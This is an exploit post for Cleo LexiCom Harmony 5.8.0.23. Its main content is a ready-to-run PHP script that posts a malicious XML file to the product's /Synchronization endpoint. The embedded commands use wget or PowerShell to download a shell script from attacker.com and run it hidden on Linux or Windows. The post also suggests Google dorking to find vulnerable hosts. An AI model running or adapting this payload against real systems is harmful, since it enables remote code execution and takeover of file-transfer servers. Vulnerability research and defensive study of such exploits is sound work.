=============================================================================================================================================
| # Title     : Cleo LexiCom Harmony 5.8.0.23 PHP Code Injection Vulnerability                                                              |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://cleo.com                                                                                                            |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Uploads a malicious XML file that can execute shell commands on the target. 

   Exploits CSRF to execute unauthorized commands via the application.
 
[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] SeT target  = Line : 34 + 39 + 68

[+] PayLoad :

<?php

function sendRequest($url, $data = null, $headers = [], $method = 'GET') {
    $ch = curl_init();

    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

    if (!empty($headers)) {
        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    }

    if ($method == 'POST') {
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    }

    $response = curl_exec($ch);
    curl_close($ch);
    
    return $response;
}

// 📌 استغلال CSRF لرفع ملف ضار إلى السيرفر
function exploitCSRF($target) {
    $boundary = "------------------------" . md5(rand(0, 99999));

    // ✅ دعم كل من Windows و Linux
    $payload = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n";
    $payload .= "<Host>\n";
    $payload .= "  <Command><![CDATA[\n";
    $payload .= "  if [ \"\$(uname -s)\" = \"Linux\" ]; then\n";
    $payload .= "    wget http://attacker.com/shell.sh -O /tmp/shell.sh;\n";
    $payload .= "    chmod +x /tmp/shell.sh;\n";
    $payload .= "    /tmp/shell.sh;\n";
    $payload .= "  else\n";
    $payload .= "    powershell -NoProfile -ExecutionPolicy Bypass -Command \"";
    $payload .= "    Invoke-WebRequest -Uri 'http://attacker.com/shell.bat' -OutFile 'C:\\\\Windows\\\\Temp\\\\shell.bat'; ";
    $payload .= "    Start-Process -FilePath 'C:\\\\Windows\\\\Temp\\\\shell.bat' -WindowStyle Hidden\";\n";
    $payload .= "  fi\n";
    $payload .= "  ]]></Command>\n";
    $payload .= "</Host>";

    $postData = "--$boundary\r\n";
    $postData .= "Content-Disposition: form-data; name=\"file\"; filename=\"exploit.xml\"\r\n";
    $postData .= "Content-Type: application/xml\r\n\r\n";
    $postData .= $payload . "\r\n";
    $postData .= "--$boundary--\r\n";

    $headers = [
        "Content-Type: multipart/form-data; boundary=$boundary",
        "VLSync: Multipart;l=0,Acknowledge"
    ];

    $url = "$target/Synchronization";
    
    $response = sendRequest($url, $postData, $headers, 'POST');
    
    if (strpos($response, "Success") !== false) {
        echo "[+] Exploit sent successfully!\n";
    } else {
        echo "[-] Exploit failed!\n";
    }
}

// 📌 تحديد الهدف
$target = "http://127.0.0.1"; 
exploitCSRF($target);

?>



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================